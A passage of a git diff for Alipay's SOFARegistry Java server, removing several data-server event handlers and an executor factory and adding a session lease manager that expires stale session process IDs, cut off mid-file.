- } - } - } - } - - /** - * connect specific dataserver - * - * @param dataCenter - * @param ip - */ - private void connectDataServer(String dataCenter, String ip) { - Connection conn = null; - for (int tryCount = 0; tryCount < TRY_COUNT; tryCount++) { - try { - conn = ((BoltChannel) dataNodeExchanger.connect(new URL(ip, - dataServerBootstrapConfig.getSyncDataPort()))).getConnection(); - break; - } catch (Exception e) { - LOGGER.error("[DataServerChangeEventHandler] connect dataServer {} in {} error", - ip, dataCenter, e); - TimeUtil.randomDelay(3000); - } - } - if (conn == null || !conn.isFine()) { - LOGGER.error( - "[DataServerChangeEventHandler] connect dataserver {} in {} failed five times", ip, - dataCenter); - throw new RuntimeException( - String - .format( - "[DataServerChangeEventHandler] connect dataserver %s in %s failed five times,dataServer will not work,please check connect!", - ip, dataCenter)); - } - //maybe get dataNode from metaServer,current has not start! register dataNode info to factory,wait for connect task next execute - DataServerNodeFactory.register(new DataServerNode(ip, dataCenter, conn), - dataServerBootstrapConfig); - } - - /** - * remove datacenter, and close connections of dataservers in this datacenter - * - * @param dataCenter - */ - private void removeDataCenter(String dataCenter) { - DataServerNodeFactory.getDataServerNodes(dataCenter).values().stream().map(DataServerNode::getConnection) - .filter(connection -> connection != null && connection.isFine()).forEach(Connection::close); - DataServerNodeFactory.remove(dataCenter); - LOGGER.info( - "[DataServerChangeEventHandler] remove connections of datacenter : {}", dataCenter); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/LocalDataServerChangeEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/LocalDataServerChangeEventHandler.java deleted file mode 100644 index 774b7572f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/LocalDataServerChangeEventHandler.java +++ /dev/null @@ -1,385 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.NotifyFetchDatumRequest; -import com.alipay.sofa.registry.common.model.dataserver.NotifyOnlineRequest; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.consistency.hash.ConsistentHash; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.BackupTriad; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.correction.LocalDataServerCleanHandler; -import com.alipay.sofa.registry.server.data.event.LocalDataServerChangeEvent; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.node.DataNodeStatus; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerNodeFactory; -import com.alipay.sofa.registry.server.data.util.LocalServerStatusEnum; -import com.alipay.sofa.registry.server.data.util.TimeUtil; -import com.google.common.collect.Lists; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.Executor; -import java.util.concurrent.LinkedBlockingDeque; -import java.util.concurrent.atomic.AtomicBoolean; - -/** - * - * - * @author qian.lqlq - * @version $Id: LocalDataServerChangeEventHandler.java, v 0.1 2018-04-28 23:55 qian.lqlq Exp $ - */ -public class LocalDataServerChangeEventHandler extends - AbstractEventHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(LocalDataServerChangeEventHandler.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private LocalDataServerCleanHandler localDataServerCleanHandler; - - @Autowired - private DataServerCache dataServerCache; - - @Autowired - private DataNodeExchanger dataNodeExchanger; - - @Autowired - private DataNodeStatus dataNodeStatus; - - private BlockingQueue events = new LinkedBlockingDeque<>(); - - private AtomicBoolean isChanged = new AtomicBoolean(false); - - @Override - public Class interest() { - return LocalDataServerChangeEvent.class; - } - - @Override - public void doHandle(LocalDataServerChangeEvent localDataServerChangeEvent) { - isChanged.set(true); - localDataServerCleanHandler.reset(); - events.offer(localDataServerChangeEvent); - } - - @Override - public void afterPropertiesSet() throws Exception { - super.afterPropertiesSet(); - start(); - } - - /** - * - */ - public void start() { - Executor executor = ExecutorFactory - .newSingleThreadExecutor(LocalDataServerChangeEventHandler.class.getSimpleName()); - executor.execute(new LocalClusterDataSyncer()); - } - - private class LocalClusterDataSyncer implements Runnable { - - @Override - public void run() { - while (true) { - try { - LocalDataServerChangeEvent event = events.take(); - //if the new joined servers contains self, set status as INITIAL - Set newJoined = event.getNewJoined(); - if (newJoined.contains(DataServerConfig.IP) - && dataNodeStatus.getStatus() != LocalServerStatusEnum.INITIAL) { - dataNodeStatus.setStatus(LocalServerStatusEnum.INITIAL); - } - //if size of events is greater than 0, not handle and continue, only handle the last one in the queue - if (events.size() > 0) { - continue; - } - long changeVersion = event.getVersion(); - - LOGGER.info("begin handle dataserver change, version={},localDataServer={}", - changeVersion, event.getLocalDataServerMap().keySet()); - isChanged.set(false); - if (LocalServerStatusEnum.WORKING == dataNodeStatus.getStatus()) { - //if local server is working, compare sync data - notifyToFetch(event, changeVersion); - } else { - dataServerCache.checkAndUpdateStatus(changeVersion); - //if local server is not working, notify others that i am newer - notifyOnline(changeVersion); - - dataServerCache.updateItem(event.getLocalDataServerMap(), - event.getLocalDataCenterversion(), - dataServerBootstrapConfig.getLocalDataCenter()); - } - } catch (Throwable t) { - LOGGER.error("sync local data error", t); - } - } - } - - /** - * notify onlined newly dataservers to fetch datum - * - * @param event - * @param changeVersion - */ - private void notifyToFetch(LocalDataServerChangeEvent event, long changeVersion) { - - Map dataServerMapIn = event.getLocalDataServerMap(); - List dataServerNodeList = Lists.newArrayList(dataServerMapIn.values()); - ConsistentHash consistentHash = new ConsistentHash<>( - dataServerBootstrapConfig.getNumberOfReplicas(), dataServerNodeList); - Map dataServerMap = new ConcurrentHashMap<>(dataServerMapIn); - - Map>> toBeSyncMap = getToBeSyncMap(consistentHash); - if (!isChanged.get()) { - if (!toBeSyncMap.isEmpty()) { - for (Entry>> toBeSyncEntry : toBeSyncMap - .entrySet()) { - String ip = toBeSyncEntry.getKey(); - Map> allVersionMap = new HashMap<>(); - Map> dataInfoMap = toBeSyncEntry - .getValue(); - for (Entry> dataCenterEntry : dataInfoMap - .entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - Map versionMap = new HashMap<>(); - Map dataTriadMap = dataCenterEntry.getValue(); - for (Entry dataTriadEntry : dataTriadMap - .entrySet()) { - String dataInfoId = dataTriadEntry.getKey(); - Datum datum = DatumCache.get(dataCenter, dataInfoId); - if (datum != null) { - versionMap.put(dataInfoId, datum.getVersion()); - } - } - if (!versionMap.isEmpty()) { - allVersionMap.put(dataCenter, versionMap); - } - } - if (!allVersionMap.isEmpty()) { - dataServerMap.remove(ip); - if (doNotify(ip, allVersionMap, changeVersion)) { - //remove new status node,avoid duplicate notify sync data - dataServerCache.removeNotifyNewStatusNode(ip); - } - } - } - } - //if no datum to notify, notify empty map - if (!dataServerMap.isEmpty()) { - for (String targetIp : dataServerMap.keySet()) { - if (doNotify(targetIp, new HashMap<>(), changeVersion)) { - //remove new status node,avoid duplicate notify sync data - dataServerCache.removeNotifyNewStatusNode(targetIp); - } - } - } - if (!isChanged.get()) { - //update server list - dataServerCache.updateItem(dataServerMapIn, event.getLocalDataCenterversion(), - dataServerBootstrapConfig.getLocalDataCenter()); - } - } - } - - /** - * get map of datum to be synced - * - * @param consistentHash - * @return - */ - private Map>> getToBeSyncMap(ConsistentHash consistentHash) { - - Map>> toBeSyncMap = new HashMap<>(); - Map> triadCache = new HashMap<>(); - - //compute new triad for every datum in cache - Map> allMap = DatumCache.getAll(); - for (Entry> dataCenterEntry : allMap.entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - Map datumMap = dataCenterEntry.getValue(); - for (String dataInfoId : datumMap.keySet()) { - //if dataservers are changed, no longer to handle - if (isChanged.get()) { - return new HashMap<>(); - } - //compute new triad by new dataservers - List backupNodes; - if (triadCache.containsKey(dataInfoId)) { - backupNodes = triadCache.get(dataInfoId); - } else { - backupNodes = consistentHash.getNUniqueNodesFor(dataInfoId, - dataServerBootstrapConfig.getStoreNodes()); - triadCache.put(dataInfoId, backupNodes); - } - BackupTriad backupTriad = dataServerCache.calculateOldBackupTriad(dataInfoId, - dataServerBootstrapConfig.getLocalDataCenter(), dataServerBootstrapConfig); - if (backupTriad != null) { - List newJoinedNodes = backupTriad.getNewJoined(backupNodes, - dataServerCache.getNotWorking()); - //all data node send notify to new join,the same data maybe send twice,receiver check same data duplicate! - LOGGER - .info( - "DataInfoId {} has got newJoinedNodes={} for backupNodes={},now backupTriad is {}", - dataInfoId, newJoinedNodes, backupNodes, backupTriad); - if (!newJoinedNodes.isEmpty()) { - for (DataNode node : newJoinedNodes) { - String ip = node.getIp(); - if (!toBeSyncMap.containsKey(ip)) { - toBeSyncMap.put(ip, new HashMap<>()); - } - Map> dataInfoMap = toBeSyncMap - .get(ip); - if (!dataInfoMap.containsKey(dataCenter)) { - dataInfoMap.put(dataCenter, new HashMap<>()); - } - dataInfoMap.get(dataCenter).put(dataInfoId, backupTriad); - } - } - } - } - } - LOGGER.info("Get to Be SyncMap {}", toBeSyncMap); - return toBeSyncMap; - } - - /** - * do notify - * - * @param targetIp - * @param notifyVersionMap - */ - private boolean doNotify(String targetIp, Map> notifyVersionMap, - long version) { - while (!isChanged.get()) { - DataServerNode targetNode = DataServerNodeFactory.getDataServerNode( - dataServerBootstrapConfig.getLocalDataCenter(), targetIp); - if (targetNode == null || targetNode.getConnection() == null) { - LOGGER.info( - "notify version change to sync has not connect,targetNode={}, map={}", - targetIp, notifyVersionMap); - return false; - } - try { - CommonResponse response = (CommonResponse) dataNodeExchanger.request( - new Request() { - @Override - public Object getRequestBody() { - return new NotifyFetchDatumRequest(notifyVersionMap, - DataServerConfig.IP, version); - } - - @Override - public URL getRequestUrl() { - return new URL(targetNode.getConnection().getRemoteIP(), targetNode - .getConnection().getRemotePort()); - } - }).getResult(); - - if (response.isSuccess()) { - LOGGER - .info( - "notify {} version change to sync,current node list version={}, map={}", - targetNode.getIp(), version, notifyVersionMap); - return true; - } else { - throw new RuntimeException(response.getMessage()); - } - } catch (Throwable e) { - LOGGER.error("notify {} to fetch datum error", targetIp, e); - TimeUtil.randomDelay(500); - } - } - return false; - } - - /** - * notify other dataservers that this server is online newly - * - * @param changeVersion - */ - private void notifyOnline(long changeVersion) { - Map dataServerNodeMap = DataServerNodeFactory - .getDataServerNodes(dataServerBootstrapConfig.getLocalDataCenter()); - for (Entry serverEntry : dataServerNodeMap.entrySet()) { - while (true) { - String ip = serverEntry.getKey(); - DataServerNode dataServerNode = serverEntry.getValue(); - if (dataServerNode == null) { - break; - } - try { - if (dataServerNode.getConnection() == null - || !dataServerNode.getConnection().isFine()) { - //maybe get dataNode from metaServer,current has not connected!wait for connect task execute - TimeUtil.randomDelay(1000); - continue; - } - CommonResponse response = (CommonResponse) dataNodeExchanger.request( - new Request() { - - @Override - public Object getRequestBody() { - return new NotifyOnlineRequest(DataServerConfig.IP, - changeVersion); - } - - @Override - public URL getRequestUrl() { - return new URL(dataServerNode.getConnection().getRemoteIP(), - dataServerNode.getConnection().getRemotePort()); - } - }).getResult(); - if (response.isSuccess()) { - LOGGER.info("notify {} that i am newer success,version={}", ip, - changeVersion); - break; - } else { - throw new RuntimeException(response.getMessage()); - } - } catch (Exception e) { - LOGGER.info("notify {} that i am newer failed", ip); - LOGGER.error("notify {} that i am newer error", ip, e); - TimeUtil.randomDelay(500); - } - } - } - } - - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/MetaServerChangeEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/MetaServerChangeEventHandler.java deleted file mode 100644 index 3518503cb..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/MetaServerChangeEventHandler.java +++ /dev/null @@ -1,170 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event.handler; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.event.DataServerChangeEvent; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.MetaServerChangeEvent; -import com.alipay.sofa.registry.server.data.remoting.MetaNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import com.alipay.sofa.registry.server.data.remoting.metaserver.MetaServerConnectionFactory; -import com.alipay.sofa.registry.server.data.util.TimeUtil; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.util.CollectionUtils; - -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: MetaServerChangeEventHandler.java, v 0.1 2018-03-13 15:31 qian.lqlq Exp $ - */ -public class MetaServerChangeEventHandler extends AbstractEventHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaServerChangeEventHandler.class); - private static final int TRY_COUNT = 3; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private IMetaServerService metaServerService; - - @Autowired - private MetaNodeExchanger metaNodeExchanger; - - @Autowired - private EventCenter eventCenter; - - @Autowired - private MetaServerConnectionFactory metaServerConnectionFactory; - - @Override - public Class interest() { - return MetaServerChangeEvent.class; - } - - @Override - public void doHandle(MetaServerChangeEvent event) { - Map> ipMap = event.getIpMap(); - for (Entry> ipEntry : ipMap.entrySet()) { - String dataCenter = ipEntry.getKey(); - Set ips = ipEntry.getValue(); - if (!CollectionUtils.isEmpty(ips)) { - for (String ip : ips) { - Connection connection = metaServerConnectionFactory.getConnection(dataCenter, - ip); - if (connection == null || !connection.isFine()) { - registerMetaServer(dataCenter, ip); - } - } - Set ipSet = metaServerConnectionFactory.getIps(dataCenter); - for (String ip : ipSet) { - if (!ips.contains(ip)) { - metaServerConnectionFactory.remove(dataCenter, ip); - LOGGER - .info( - "[MetaServerChangeEventHandler] remove connection, datacenter:{}, ip:{}", - dataCenter, ip); - } - } - } else { - //remove connections of dataCenter if the connectionMap of the dataCenter in ipMap is empty - removeDataCenter(dataCenter); - } - } - //remove connections of dataCenter if the dataCenter not exist in ipMap - Set dataCenters = metaServerConnectionFactory.getAllDataCenters(); - for (String dataCenter : dataCenters) { - if (!ipMap.containsKey(dataCenter)) { - removeDataCenter(dataCenter); - } - } - } - - private void registerMetaServer(String dataCenter, String ip) { - - PeerId leader = metaServerService.getLeader(); - - for (int tryCount = 0; tryCount < TRY_COUNT; tryCount++) { - try { - Channel channel = metaNodeExchanger.connect(new URL(ip, dataServerBootstrapConfig - .getMetaServerPort())); - //connect all meta server - if (channel != null && channel.isConnected()) { - metaServerConnectionFactory.register(dataCenter, ip, - ((BoltChannel) channel).getConnection()); - } - //register leader meta node - if (ip.equals(leader.getIp())) { - Object obj = null; - try { - obj = metaNodeExchanger.request(new Request() { - @Override - public Object getRequestBody() { - return new DataNode(new URL(DataServerConfig.IP), - dataServerBootstrapConfig.getLocalDataCenter()); - } - - @Override - public URL getRequestUrl() { - return new URL(ip, dataServerBootstrapConfig.getMetaServerPort()); - } - }).getResult(); - } catch (Exception e) { - PeerId newLeader = metaServerService.refreshLeader(); - LOGGER - .error( - - "[MetaServerChangeEventHandler] register data node send error!retry once leader :{} error", - newLeader.getIp(), e); - } - if (obj instanceof NodeChangeResult) { - NodeChangeResult result = (NodeChangeResult) obj; - Map versionMap = result.getDataCenterListVersions(); - eventCenter.post(new DataServerChangeEvent(result.getNodes(), versionMap)); - break; - } - } - - } catch (Exception e) { - LOGGER.error("[MetaServerChangeEventHandler] connect metaServer:{} error", ip, e); - TimeUtil.randomDelay(1000); - } - } - } - - private void removeDataCenter(String dataCenter) { - metaServerConnectionFactory.remove(dataCenter); - LOGGER.info("[MetaServerChangeEventHandler] remove connections of datacenter : {}", - dataCenter); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/StartTaskEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/StartTaskEventHandler.java deleted file mode 100644 index c6adfffe1..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/StartTaskEventHandler.java +++ /dev/null @@ -1,65 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event.handler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.cache.CacheDigestTask; -import com.alipay.sofa.registry.server.data.event.StartTaskEvent; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.dataserver.task.AbstractTask; - -import javax.annotation.Resource; -import java.util.List; -import java.util.concurrent.ScheduledExecutorService; - -/** - * - * @author qian.lqlq - * @version $Id: StartTaskEventHandler.java, v 0.1 2018-03-07 21:21 qian.lqlq Exp $ - */ -public class StartTaskEventHandler extends AbstractEventHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(StartTaskEventHandler.class); - - @Resource(name = "tasks") - private List tasks; - - private ScheduledExecutorService executor = null; - - @Override - public Class interest() { - return StartTaskEvent.class; - } - - @Override - public void doHandle(StartTaskEvent event) { - if (executor == null || executor.isShutdown()) { - executor = ExecutorFactory.newScheduledThreadPool(tasks.size(), this.getClass() - .getSimpleName()); - for (AbstractTask task : tasks) { - LOGGER.info("[StartTaskEventHandler] start task:{}", task.getName()); - executor.scheduleWithFixedDelay(task, task.getInitialDelay(), task.getDelay(), - task.getTimeUnit()); - LOGGER.info("[StartTaskEventHandler] start task:{} success", task.getName()); - } - new CacheDigestTask().start(); - } - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/executor/ExecutorFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/executor/ExecutorFactory.java deleted file mode 100644 index 233e6013c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/executor/ExecutorFactory.java +++ /dev/null @@ -1,100 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.executor; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.util.NamedThreadFactory; - -import java.util.concurrent.ArrayBlockingQueue; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.Executor; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ScheduledThreadPoolExecutor; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * the factory to create executor - * - * @author qian.lqlq - * @version $Id: ExecutorFactory.java, v 0.1 2018-03-08 14:50 qian.lqlq Exp $ - */ -public class ExecutorFactory { - - public static final ThreadPoolExecutor EXECUTOR; - private static final Logger LOGGER = LoggerFactory.getLogger(ExecutorFactory.class); - - static { - BlockingQueue workQueue = new ArrayBlockingQueue<>(10); - EXECUTOR = new ThreadPoolExecutor(20, 300, 1, TimeUnit.HOURS, workQueue, - new NamedThreadFactory("CommonExecutor")) { - - /** - * @see ThreadPoolExecutor#afterExecute(Runnable, Throwable) - */ - @Override - protected void afterExecute(Runnable r, Throwable t) { - super.afterExecute(r, t); - if (t != null) { - LOGGER.error("[CommonThreadPool] ThreadPoolUncaughtException:{}", - t.getMessage(), t); - } - } - }; - } - - /** - * get executor - * @return - */ - public static ThreadPoolExecutor getCommonExecutor() { - return EXECUTOR; - } - - /** - * new thread pool - * @param size - * @param name - * @return - */ - public static Executor newFixedThreadPool(int size, String name) { - return new ThreadPoolExecutor(size, size, 0L, TimeUnit.MILLISECONDS, - new LinkedBlockingQueue<>(), new NamedThreadFactory(name)); - } - - /** - * new scheduled thread pool - * @param size - * @param name - * @return - */ - public static ScheduledExecutorService newScheduledThreadPool(int size, String name) { - return new ScheduledThreadPoolExecutor(size, new NamedThreadFactory(name)); - } - - /** - * new single thread executor - * @param name - * @return - */ - public static Executor newSingleThreadExecutor(String name) { - return new ThreadPoolExecutor(1, 1, 0L, TimeUnit.MILLISECONDS, new LinkedBlockingQueue<>(), - new NamedThreadFactory(name)); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManager.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManager.java new file mode 100644 index 000000000..6f02114c6 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/lease/SessionLeaseManager.java @@ -0,0 +1,255 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.lease; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.store.ProcessIdCache; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.bolt.BoltChannel; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.CleanContinues; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeUnit; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-30 10:30 yuzhi.lyz Exp $ + */ +public final class SessionLeaseManager { + private static final Logger LOGGER = LoggerFactory.getLogger(SessionLeaseManager.class); + + private static final Logger COMPACT_LOGGER = LoggerFactory.getLogger("COMPACT"); + + private static final int MIN_LEASE_SEC = 5; + + @Autowired DataServerConfig dataServerConfig; + @Autowired DatumStorage localDatumStorage; + + @Autowired Exchange boltExchange; + + @Autowired SlotManager slotManager; + + @Autowired MetaServerService metaServerService; + + private final Map connectIdRenewTimestampMap = new ConcurrentHashMap<>(); + + @PostConstruct + public void init() { + validateSessionLeaseSec(dataServerConfig.getSessionLeaseSecs()); + ConcurrentUtils.createDaemonThread("session-lease-cleaner", new LeaseCleaner()).start(); + } + + public static void validateSessionLeaseSec(int sec) { + if (sec < MIN_LEASE_SEC) { + throw new IllegalArgumentException( + String.format("min sessionLeaseSec(%d): %d", MIN_LEASE_SEC, sec)); + } + } + + public void renewSession(ProcessId sessionProcessId) { + sessionProcessId = ProcessIdCache.cache(sessionProcessId); + connectIdRenewTimestampMap.put(sessionProcessId, System.currentTimeMillis()); + } + + boolean contains(ProcessId sessionProcessId) { + return connectIdRenewTimestampMap.containsKey(sessionProcessId); + } + + private List cleanExpireLease( + int leaseMs, Set connProcessIds, Set metaProcessIds) { + final long lastRenew = System.currentTimeMillis() - leaseMs; + Map expires = Maps.newHashMap(); + for (Map.Entry e : connectIdRenewTimestampMap.entrySet()) { + if (e.getValue() < lastRenew) { + expires.put(e.getKey(), e.getValue()); + } + } + if (expires.isEmpty()) { + return Collections.emptyList(); + } + + LOGGER.info("[collectExpire]expires={}, {}", expires.size(), expires); + List cleans = Lists.newArrayListWithCapacity(expires.size()); + for (Map.Entry expire : expires.entrySet()) { + final ProcessId p = expire.getKey(); + if (connProcessIds.contains(p)) { + renewSession(p); + // maybe happens in fullGc or high load scenario + LOGGER.info("[expireHasConn]{}", expire); + continue; + } + if (metaProcessIds.contains(p)) { + renewSession(p); + // maybe happens in fullGc or or high load scenario + LOGGER.info("[expireHasMeta]{}", expire); + continue; + } + // only remove the expire with the collect timestamp + // maybe renew happens in the cleaning + if (connectIdRenewTimestampMap.remove(p, expire.getValue())) { + LOGGER.info("[cleanExpire]{}", expire); + cleans.add(p); + } + } + return cleans; + } + + void cleanStorage() { + // make sure the existing processId be clean + Set stores = localDatumStorage.getSessionProcessIds(); + final int deadlineMillis = dataServerConfig.getSessionLeaseCleanDeadlineSecs() * 1000; + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + if (slotManager.isFollower(i)) { + LOGGER.info("skip clean for follower, slotId={}", i); + continue; + } + if (slotManager.isLeader(i)) { + // own the slot and is leader + for (ProcessId p : stores) { + if (!connectIdRenewTimestampMap.containsKey(p)) { + // double check with newly meta.processIds + long start = System.currentTimeMillis(); + if (metaServerService.getSessionProcessIds().contains(p)) { + LOGGER.info("[expireHasMeta]{}", p); + continue; + } + + // in fullGC case, the cleaning maybe very slow + // after double check, the session.processId is insert, but cleanup not know it + // deadlineTs, ensure that the cleanup ends within the expected time + final long deadlineTimestamp = start + deadlineMillis; + CleanLeaseContinues continues = new CleanLeaseContinues(deadlineTimestamp); + Map versionMap = localDatumStorage.clean(i, p, continues); + LOGGER.info( + "[cleanSession]broken={},slotId={},datas={},pubs={},span={},{}", + continues.broken, + i, + versionMap.size(), + continues.cleanNum, + System.currentTimeMillis() - start, + p); + } + } + } + } + } + + static final class CleanLeaseContinues implements CleanContinues { + private final long deadlineTimestamp; + private int cleanNum; + volatile boolean broken; + + CleanLeaseContinues(long deadlineTimestamp) { + this.deadlineTimestamp = deadlineTimestamp; + } + + @Override + public boolean continues() { + final long now = System.currentTimeMillis(); + // make sure at lease clean one item + if (cleanNum != 0 && now > deadlineTimestamp) { + this.broken = true; + return false; + } + return true; + } + + @Override + public void onClean(int num) { + cleanNum += num; + } + } + + private void renewBy(Set processIds) { + for (ProcessId processId : processIds) { + renewSession(processId); + } + } + + Set getProcessIdsInConnection() { + Server server = boltExchange.getServer(dataServerConfig.getPort()); + if (server == null) { + LOGGER.warn("Server 